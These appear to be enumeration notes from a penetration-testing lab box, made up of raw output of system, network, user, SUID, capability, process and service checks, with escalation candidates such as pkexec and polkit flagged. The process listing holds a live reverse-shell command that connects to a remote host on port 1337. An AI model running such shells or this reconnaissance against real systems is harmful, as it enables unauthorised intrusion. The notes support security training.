System/Kernel


uname -a ; cat /etc/*release
Linux splodge 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
 
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
 
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)
  • 3.10.0-1127.19.1.el7.x86_64
  • x86_64
  • CentOS Linux 7 (Core)

Networks


bash-4.2$ /sbin/route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         gateway         0.0.0.0         UG    0      0        0 ens160
link-local      0.0.0.0         255.255.0.0     U     1003   0        0 ens160
192.168.219.0   0.0.0.0         255.255.255.0   U     0      0        0 ens160
 
bash-4.2$ /sbin/arp -a
/sbin/arp -a
gateway (192.168.219.254) at 00:50:56:9e:59:95 [ether] on ens160
bash-4.2$ netstat -antup4
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1080/nginx: worker  
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1080/nginx: worker  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      1080/nginx: worker  
tcp        0      0 127.0.0.1:60110         127.0.0.1:5432          ESTABLISHED -                   
tcp        0      0 127.0.0.1:5432          127.0.0.1:60110         ESTABLISHED -                   
tcp        0    141 192.168.219.108:54448   192.168.45.221:1337     ESTABLISHED 13545/bash          
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -                   
udp        0      0 127.0.0.1:58704         127.0.0.1:58704         ESTABLISHED -                   
udp        0      0 192.168.219.108:38425   88.80.189.24:123        ESTABLISHED -                   
udp        0      0 192.168.219.108:44840   178.79.140.210:123      ESTABLISHED -                   
udp        0      0 192.168.219.108:52138   217.114.59.3:123        ESTABLISHED -                   
udp        0      0 192.168.219.108:38082   193.57.144.50:123       ESTABLISHED -                   

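  • tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - (SMTP listener bound to loopback only, so not reachable from the network; presumably the Postfix master shown under Processes)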

Users & Groups


bash-4.2$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
thesplodge:x:1000:1000::/home/thesplodge:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
nginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
total 0
0 dr-xr-xr-x. 17 root       root       244 Oct 18  2020 ..
0 drwxr-xr-x.  3 thesplodge thesplodge 115 Oct 17  2020 thesplodge
0 drwxr-xr-x.  3 root       root        24 Oct 17  2020 .

thesplodge

bash-4.2$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)
uid=26(postgres) gid=26(postgres) groups=26(postgres)
uid=997(nginx) gid=995(nginx) groups=995(nginx)
uid=48(apache) gid=48(apache) groups=48(apache)

uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)

SUIDs


bash-4.2$ find / -perm -04000 -ls -type f 2>/dev/null
25381873   76 -rwsr-xr-x   1 root     root        73888 Aug  8  2019 /usr/bin/chage
25381874   80 -rwsr-xr-x   1 root     root        78408 Aug  8  2019 /usr/bin/gpasswd
25652415   24 -rws--x--x   1 root     root        23968 Apr  1  2020 /usr/bin/chfn
25652418   24 -rws--x--x   1 root     root        23880 Apr  1  2020 /usr/bin/chsh
25381877   44 -rwsr-xr-x   1 root     root        41936 Aug  8  2019 /usr/bin/newgrp
25652498   32 -rwsr-xr-x   1 root     root        32128 Apr  1  2020 /usr/bin/su
25703692  144 ---s--x--x   1 root     root       147336 Apr  1  2020 /usr/bin/sudo
25652483   44 -rwsr-xr-x   1 root     root        44264 Apr  1  2020 /usr/bin/mount
25672720   32 -rwsr-xr-x   1 root     root        31984 Apr  1  2020 /usr/bin/umount
25742885   60 -rwsr-xr-x   1 root     root        57656 Aug  8  2019 /usr/bin/crontab
25742643   24 -rwsr-xr-x   1 root     root        23576 Apr  1  2020 /usr/bin/pkexec
25385618   28 -rwsr-xr-x   1 root     root        27856 Mar 31  2020 /usr/bin/passwd
25176607   32 -rwsr-xr-x   1 root     root        32096 Oct 30  2018 /usr/bin/fusermount
  2683   36 -rwsr-xr-x   1 root     root        36272 Apr  1  2020 /usr/sbin/unix_chkpwd
  2681   12 -rwsr-xr-x   1 root     root        11232 Apr  1  2020 /usr/sbin/pam_timestamp_check
424979   12 -rwsr-xr-x   1 root     root        11296 Mar 31  2020 /usr/sbin/usernetctl
8709195   16 -rwsr-xr-x   1 root     root        15432 Apr  1  2020 /usr/lib/polkit-1/polkit-agent-helper-1
8708920   60 -rwsr-x---   1 root     dbus        57936 Jul 13  2020 /usr/libexec/dbus-1/dbus-daemon-launch-helper
  • 25742643 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
  • 8709195 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1

SGIDs


bash-4.2$ find / -type f -perm -02000 -ls 2>/dev/null
25186342   16 -r-xr-sr-x   1 root     tty         15344 Jun  9  2014 /usr/bin/wall
25672726   20 -rwxr-sr-x   1 root     tty         19544 Apr  1  2020 /usr/bin/write
25824105  376 ---x--s--x   1 root     nobody     382216 Aug  8  2019 /usr/bin/ssh-agent
424974   12 -rwxr-sr-x   1 root     root        11224 Mar 31  2020 /usr/sbin/netreport
434162  216 -rwxr-sr-x   1 root     postdrop   218560 Apr  1  2020 /usr/sbin/postdrop
434169  260 -rwxr-sr-x   1 root     postdrop   264128 Apr  1  2020 /usr/sbin/postqueue
17080665   12 -rwx--s--x   1 root     utmp        11192 Jun  9  2014 /usr/libexec/utempter/utempter
8717664  456 ---x--s--x   1 root     ssh_keys   465760 Aug  8  2019 /usr/libexec/openssh/ssh-keysign

Capabilities


bash-4.2$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

Processes


bash-4.2$ ps -auxwww
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.2 125364  3876 ?        Ss   07:42   0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       563  0.0  0.1  39084  2072 ?        Ss   07:42   0:00 /usr/lib/systemd/systemd-journald
root       582  0.0  0.0 124840  1308 ?        Ss   07:42   0:00 /usr/sbin/lvmetad -f
root       587  0.0  0.1  45028  1940 ?        Ss   07:42   0:00 /usr/lib/systemd/systemd-udevd
root       691  0.0  0.0  55532   848 ?        S<sl 07:42   0:00 /sbin/auditd
polkitd    714  0.0  0.5 612248 10084 ?        Ssl  07:42   0:00 /usr/lib/polkit-1/polkitd --no-debug
root       715  0.0  0.3  99688  6196 ?        Ss   07:42   0:00 /usr/bin/VGAuthService -s
root       716  0.0  0.3 314456  7300 ?        Ssl  07:42   0:08 /usr/bin/vmtoolsd
root       722  0.0  0.0  26384  1764 ?        Ss   07:42   0:00 /usr/lib/systemd/systemd-logind
dbus       723  0.0  0.1  58244  2468 ?        Ss   07:42   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
chrony     732  0.0  0.0 117808  1732 ?        S    07:42   0:03 /usr/sbin/chronyd
root       744  0.0  0.0 126388  1580 ?        Ss   07:42   0:00 /usr/sbin/crond -n
root       753  0.0  0.0 110208   856 tty1     Ss+  07:42   0:00 /sbin/agetty --noclear tty1 linux
root       765  0.0  0.4 550204  8892 ?        Ssl  07:42   0:00 /usr/sbin/NetworkManager --no-daemon
root       996  0.0  0.5 276180  9548 ?        Ss   07:43   0:00 php-fpm: master process (/etc/php-fpm.conf)
root       997  0.0  0.1 226744  3340 ?        Ssl  07:43   0:00 /usr/sbin/rsyslogd -n
root       998  0.0  0.9 574304 17460 ?        Ssl  07:43   0:01 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       999  0.0  0.2 112924  4344 ?        Ss   07:43   0:00 /usr/sbin/sshd -D
thesplo+  1016  0.0  0.9 397396 17472 ?        Ss   07:43   0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdata
thesplo+  1056  0.0  0.1 249656  2092 ?        Ss   07:43   0:00 postgres: logger   
thesplo+  1063  0.0  0.2 397512  3804 ?        Ss   07:43   0:00 postgres: checkpointer   
thesplo+  1064  0.0  0.1 397528  3356 ?        Ss   07:43   0:00 postgres: background writer   
thesplo+  1065  0.0  0.3 397396  6248 ?        Ss   07:43   0:00 postgres: walwriter   
thesplo+  1066  0.0  0.1 398080  3304 ?        Ss   07:43   0:00 postgres: autovacuum launcher   
thesplo+  1067  0.0  0.1 251908  2284 ?        Ss   07:43   0:00 postgres: stats collector   
thesplo+  1068  0.0  0.1 397952  2808 ?        Ss   07:43   0:00 postgres: logical replication launcher   
root      1075  0.0  0.1 121040  2212 ?        Ss   07:43   0:00 nginx: master process /usr/sbin/nginx
nginx     1080  0.1  0.2 121504  4012 ?        S    07:43   0:33 nginx: worker process
root      1234  0.0  0.1  89704  2220 ?        Ss   07:43   0:00 /usr/libexec/postfix/master -w
postfix   1244  0.0  0.2  89876  4076 ?        S    07:43   0:00 qmgr -l -t unix -u
nginx    12894  0.1  1.0 286296 19216 ?        S    10:34   0:16 php-fpm: pool www
nginx    12895  0.1  1.0 286552 19292 ?        S    10:34   0:16 php-fpm: pool www
nginx    12896  0.1  1.0 286852 19772 ?        S    10:34   0:16 php-fpm: pool www
nginx    12897  0.1  1.0 286296 19260 ?        S    10:34   0:16 php-fpm: pool www
nginx    12898  0.1  1.0 286552 19312 ?        S    10:34   0:17 php-fpm: pool www
nginx    12899  0.1  1.0 286296 19192 ?        S    10:34   0:17 php-fpm: pool www
nginx    12900  0.1  1.0 286552 19816 ?        S    10:34   0:16 php-fpm: pool www
nginx    12901  0.1  0.9 285472 18380 ?        S    10:34   0:16 php-fpm: pool www
nginx    12902  0.1  0.9 285468 18372 ?        S    10:34   0:16 php-fpm: pool www
nginx    12903  0.1  1.0 287320 19852 ?        S    10:34   0:17 php-fpm: pool www
nginx    12904  0.1  1.0 286032 18892 ?        S    10:34   0:16 php-fpm: pool www
nginx    12905  0.1  1.0 286552 19516 ?        S    10:34   0:16 php-fpm: pool www
nginx    12906  0.1  1.0 286296 19188 ?        S    10:34   0:16 php-fpm: pool www
nginx    12907  0.1  1.0 286296 19204 ?        S    10:34   0:16 php-fpm: pool www
nginx    12908  0.1  1.0 286552 19812 ?        S    10:34   0:16 php-fpm: pool www
nginx    12918  0.1  1.0 286296 19196 ?        S    10:38   0:12 php-fpm: pool www
nginx    12920  0.1  1.0 286552 19284 ?        S    10:38   0:12 php-fpm: pool www
nginx    12922  0.1  1.0 286296 19200 ?        S    10:39   0:11 php-fpm: pool www
nginx    12924  0.1  1.0 286296 19612 ?        S    10:39   0:11 php-fpm: pool www
nginx    12927  0.1  1.0 286552 19292 ?        S    10:40   0:10 php-fpm: pool www
nginx    12929  0.1  1.0 286552 19812 ?        S    10:40   0:09 php-fpm: pool www
nginx    12932  0.1  1.0 286288 19040 ?        S    10:41   0:09 php-fpm: pool www
nginx    12933  0.1  1.0 286296 19204 ?        S    10:41   0:09 php-fpm: pool www
nginx    12934  0.1  1.0 286296 19576 ?        S    10:41   0:09 php-fpm: pool www
nginx    12935  0.1  0.9 285472 18364 ?        S    10:41   0:09 php-fpm: pool www
nginx    12936  0.1  1.0 286552 19296 ?        S    10:41   0:08 php-fpm: pool www
nginx    12937  0.1  0.9 285472 18448 ?        S    10:41   0:09 php-fpm: pool www
nginx    12938  0.1  1.0 286296 19192 ?        S    10:41   0:09 php-fpm: pool www
nginx    12939  0.1  1.0 286552 19292 ?        S    10:41   0:09 php-fpm: pool www
nginx    12940  0.1  0.9 285472 18452 ?        S    10:41   0:09 php-fpm: pool www
nginx    12941  0.1  1.0 286552 19292 ?        S    10:41   0:09 php-fpm: pool www
nginx    12964  0.0  1.0 286296 19192 ?        S    10:46   0:02 php-fpm: pool www
nginx    12965  0.0  1.0 287112 20008 ?        S    10:46   0:02 php-fpm: pool www
nginx    13204  0.0  1.0 286296 19196 ?        S    11:06   0:01 php-fpm: pool www
nginx    13207  0.0  1.0 287632 20408 ?        S    11:07   0:00 php-fpm: pool www
postfix  13528  0.0  0.2  89808  4052 ?        S    12:45   0:00 pickup -l -t unix -u
thesplo+ 13543  0.0  0.3 398476  6408 ?        Ss   12:49   0:00 postgres: postgres splodge 127.0.0.1(60110) idle
nginx    13544  0.0  0.0  11688  1140 ?        S    12:49   0:00 sh -c /bin/bash -i >& /dev/tcp/192.168.45.221/1337 0>&1
nginx    13545  0.0  0.0  11824  1824 ?        S    12:49   0:00 /bin/bash -i
nginx    13711  0.0  0.0  51756  1728 ?        R    12:59   0:00 ps -auxwww
  • polkitd 714 0.0 0.5 612248 10084 ? Ssl 07:42 0:00 /usr/lib/polkit-1/polkitd --no-debug
  • root 744 0.0 0.0 126388 1580 ? Ss 07:42 0:00 /usr/sbin/crond -n
  • thesplo+ 1016 0.0 0.9 397396 17472 ? Ss 07:43 0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdata
  • root 1234 0.0 0.1 89704 2220 ? Ss 07:43 0:00 /usr/libexec/postfix/master -w
  • postfix 1244 0.0 0.2 89876 4076 ? S 07:43 0:00 qmgr -l -t unix -u

Cron & Systemd


bash-4.2$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for nginx
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
 
# For details see man 4 crontabs
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
 
NEXT                         LEFT     LAST                         PASSED      UNIT                         ACTIVATES
Tue 2025-03-04 07:57:42 EST  18h left Mon 2025-03-03 07:57:42 EST  5h 3min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
 
1 timers listed.
Pass --all to see loaded but inactive timers, too.

Services


bash-4.2$ systemctl list-units --state=running
systemctl list-units --state=running
UNIT                              LOAD   ACTIVE SUB     DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
auditd.service                    loaded active running Security Auditing Service
chronyd.service                   loaded active running NTP client/server
crond.service                     loaded active running Command Scheduler
dbus.service                      loaded active running D-Bus System Message Bus
getty@tty1.service                loaded active running Getty on tty1
lvm2-lvmetad.service              loaded active running LVM2 metadata daemon
NetworkManager.service            loaded active running Network Manager
nginx.service                     loaded active running The nginx HTTP and reverse proxy server
php-fpm.service                   loaded active running The PHP FastCGI Process Manager
polkit.service                    loaded active running Authorization Manager
postfix.service                   loaded active running Postfix Mail Transport Agent
postgresql-12.service             loaded active running PostgreSQL 12 database server
rsyslog.service                   loaded active running System Logging Service
sshd.service                      loaded active running OpenSSH server daemon
systemd-journald.service          loaded active running Journal Service
systemd-logind.service            loaded active running Login Service
systemd-udevd.service             loaded active running udev Kernel Device Manager
tuned.service                     loaded active running Dynamic System Tuning Daemon
vgauthd.service                   loaded active running VGAuth Service for open-vm-tools
vmtoolsd.service                  loaded active running Service for virtual machines hosted on VMware
dbus.socket                       loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket               loaded active running LVM2 metadata daemon socket
systemd-journald.socket           loaded active running Journal Socket
systemd-udevd-control.socket      loaded active running udev Control Socket
systemd-udevd-kernel.socket       loaded active running udev Kernel Socket
 
LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.
 
26 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.

  • nginx.service loaded active running The nginx HTTP and reverse proxy server
  • php-fpm.service loaded active running The PHP FastCGI Process Manager
  • polkit.service loaded active running Authorization Manager
  • postfix.service loaded active running Postfix Mail Transport Agent
  • postgresql-12.service loaded active running PostgreSQL 12 database server

Sudo Version


bash-4.2$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

Sudo version 1.8.23

Glibc Version


bash-4.2$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

ldd (GNU libc) 2.17